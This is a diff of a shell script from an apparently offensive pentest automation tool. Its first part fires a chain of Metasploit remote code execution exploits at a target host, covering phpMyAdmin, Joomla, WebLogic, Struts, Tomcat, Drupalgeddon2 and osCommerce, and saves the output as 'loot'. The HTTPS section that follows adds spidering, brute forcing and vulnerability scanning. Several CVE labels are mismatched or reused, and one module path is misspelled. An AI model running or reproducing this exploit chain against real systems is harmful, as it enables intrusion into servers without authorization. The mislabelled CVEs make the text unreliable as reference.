msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/htp/phpmyadmin_preg_replace; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT CVE-2017-8917 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WORDPRESS REST API CONTENT INJECTION CVE-2017-5612 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/wordpress_content_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING ORACLE WEBLOGIC WLS-WSAT DESERIALIZATION RCE CVE-2017-10271 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS JAKARTA OGNL INJECTION CVE-2017-5638 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use multi/http/struts2_content_type_ognl; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 SHOWCASE OGNL RCE CVE-2017-9805 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/struts2_rest_xstream; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 REST XSTREAM RCE CVE-2017-9791 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/struts2_code_exec_showcase; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/tomcat_jsp_upload_bypass; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 NAMESPACE REDIRECT OGNL INJECTION CVE-2018-11776 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/struts2_namespace_ognl; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CISCO ASA TRAVERSAL CVE-2018-0296 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/cisco_directory_traversal; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING ORACLE WEBLOGIC SERVER DESERIALIZATION RCE CVE-2018-2628 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/misc/weblogic_deserialize; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING OSCOMMERCE INSTALLER RCE CVE-2018-2628 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/oscommerce_installer_unauth_code_exec; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw 2> /dev/null
|
||||
fi
|
||||
source modes/osint_stage_2.sh
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
|
||||
if [ "$LOOT" = "1" ]; then
|
||||
loot
|
||||
fi
|
||||
exit
|
||||
fi
|
||||
fi
|
||||
|
|
@ -73,208 +73,320 @@ if [ "$MODE" = "webporthttps" ]; then
|
|||
echo -e "$OKRED + -- --=[Port $PORT closed... skipping.$RESET"
|
||||
else
|
||||
echo -e "$OKORANGE + -- --=[Port $PORT opened... running tests...$RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CHECKING FOR WAF $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
wafw00f https://$TARGET:$PORT | tee $LOOT_DIR/web/waf-$TARGET-https-$PORT 2> /dev/null
|
||||
echo ""
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING HTTP INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
whatweb -a 3 https://$TARGET:$PORT | tee $LOOT_DIR/web/whatweb-$TARGET-https-$PORT 2> /dev/null
|
||||
echo ""
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING SERVER INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/wig/wig.py -d -q -t 50 https://$TARGET | tee $LOOT_DIR/web/wig-$TARGET-https
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wig-$TARGET-https > $LOOT_DIR/web/wig-$TARGET-https.txt 2> /dev/null
|
||||
if [ "$WAFWOOF" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CHECKING FOR WAF $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
wafw00f https://$TARGET:$PORT | tee $LOOT_DIR/web/waf-$TARGET-https-port$PORT.txt 2> /dev/null
|
||||
echo ""
|
||||
fi
|
||||
if [ "$WHATWEB" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING HTTP INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
whatweb -a 3 https://$TARGET:$PORT | tee $LOOT_DIR/web/whatweb-$TARGET-https-port$PORT.raw 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-https-port$PORT.raw > $LOOT_DIR/web/whatweb-$TARGET-https-port$PORT.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/whatweb-$TARGET-https-port$PORT.raw 2> /dev/null
|
||||
echo ""
|
||||
fi
|
||||
if [ "$WIG" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING SERVER INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/wig/wig.py -d -q https://$TARGET:$PORT | tee $LOOT_DIR/web/wig-$TARGET-https-$PORT
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wig-$TARGET-https-$PORT > $LOOT_DIR/web/wig-$TARGET-https-$PORT.txt 2> /dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 3 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null
|
||||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 https://$TARGET:$PORT | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -I -s -R https://$TARGET:$PORT | tee $LOOT_DIR/web/headers-https-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -I -s -R -L https://$TARGET:$PORT | tee $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cat $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null | grep generator | cut -d\" -f4 2> /dev/null | tee $LOOT_DIR/web/webgenerator-https-$TARGET-$PORT.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED DISPLAYING COMMENTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cat $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-https-$TARGET-$PORT.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cat $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null | egrep "\"" | cut -d\" -f2 | grep \/ | sort -u 2> /dev/null | tee $LOOT_DIR/web/weblinks-https-$TARGET-$PORT.txt 2> /dev/null
|
||||
if [ "$SSL" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING SSL/TLS INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
sslyze --regular $TARGET | tee $LOOT_DIR/web/sslyze-$TARGET.txt 2> /dev/null
|
||||
sslscan --no-failed $TARGET | tee $LOOT_DIR/web/sslscan-$TARGET.raw 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/sslscan-$TARGET.raw > $LOOT_DIR/web/sslscan-$TARGET.txt 2> /dev/null
|
||||
sslscan --no-failed $TARGET:$PORT | tee $LOOT_DIR/web/sslscan-$TARGET-$PORT.raw 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/sslscan-$TARGET-$PORT.raw > $LOOT_DIR/web/sslscan-$TARGET-$PORT.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/sslscan-$TARGET-$PORT.raw 2> /dev/null
|
||||
echo ""
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ ${DISTRO} == "blackarch" ]; then
|
||||
/bin/CutyCapt --url=https://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=10000 2> /dev/null
|
||||
/bin/CutyCapt --url=https://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
else
|
||||
cutycapt --url=https://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=10000 2> /dev/null
|
||||
cutycapt --url=https://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
fi
|
||||
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port$PORT.jpg"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING NMAP SCRIPTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -A -sV -T5 -Pn -p $PORT --script=http-vuln* $TARGET
|
||||
if [ "$PASSIVE_SPIDER" = "1" ]; then
|
||||
if [ "$BURP_SCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -X POST \"http://$BURP_HOST:$BURP_PORT/v0.1/scan\" -d \"{\"scope\":{\"include\":[{\"rule\":\"https://$TARGET:$PORT\"}],\"type\":\"SimpleScope\"},\"urls\":[\"https://$TARGET:$PORT\"]}\"$RESET"
|
||||
fi
|
||||
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"https://$TARGET:$PORT\"}],\"type\":\"SimpleScope\"},\"urls\":[\"https://$TARGET:$PORT\"]}"
|
||||
echo ""
|
||||
fi
|
||||
if [ "$NMAP_SCRIPTS" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING NMAP SCRIPTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -A -Pn -T5 -p $PORT -sV --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port$PORT
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port$PORT 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port$PORT.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/nmap-$TARGET-port$PORT 2> /dev/null
|
||||
fi
|
||||
if [ "$PASSIVE_SPIDER" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | sort -u | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$WAYBACKMACHINE" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
|
||||
if [ "$BLACKWIDOW" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
blackwidow -u https://$TARGET -l 3 -s y 2> /dev/null
|
||||
cat /usr/share/blackwidow/$TARGET*/* > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
blackwidow -u https://$TARGET:$PORT -l 3 -s y -v n 2> /dev/null
|
||||
cat /usr/share/blackwidow/$TARGET*/* 2> /dev/null > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
fi
|
||||
if [ "$WEB_BRUTE_COMMON" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
|
||||
fi
|
||||
if [ "$WEB_BRUTE_FULLSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
|
||||
fi
|
||||
if [ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e html
|
||||
fi
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_INSANE -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
wget https://$TARGET:$PORT/robots.txt -O $LOOT_DIR/web/robots-$TARGET:$PORT-https.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
clusterd --ssl -i $TARGET -p $PORT 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
wpscan --url https://$TARGET:$PORT --disable-tls-checks
|
||||
echo ""
|
||||
wpscan --url https://$TARGET:$PORT/wordpress/ --disable-tls-checks
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING CMSMAP $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cmsmap https://$TARGET:$PORT
|
||||
echo ""
|
||||
cmsmap https://$TARGET:$PORT/wordpress/
|
||||
echo ""
|
||||
if [ "$NIKTO" = "1" ]; then
|
||||
if [ "$CLUSTERD" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
clusterd --ssl -i $TARGET -p $PORT 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-port$PORT.txt
|
||||
fi
|
||||
if [ "$CMSMAP" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING CMSMAP $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cmsmap https://$TARGET:$PORT | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port$PORTa.txt
|
||||
echo ""
|
||||
cmsmap https://$TARGET:$PORT/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port$PORTb.txt
|
||||
echo ""
|
||||
fi
|
||||
if [ "$WPSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
wpscan --url https://$TARGET:$PORT --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTa.txt
|
||||
echo ""
|
||||
wpscan --url https://$TARGET:$PORT/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTb.txt
|
||||
fi
|
||||
if [ "$NIKTO" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nikto -h https://$TARGET:$PORT -output $LOOT_DIR/web/nikto-$TARGET-https-$PORT.txt
|
||||
nikto -h https://$TARGET:$PORT -output $LOOT_DIR/web/nikto-$TARGET-https-port$PORT.txt
|
||||
fi
|
||||
if [ "$SHOCKER" == "1" ]; then
|
||||
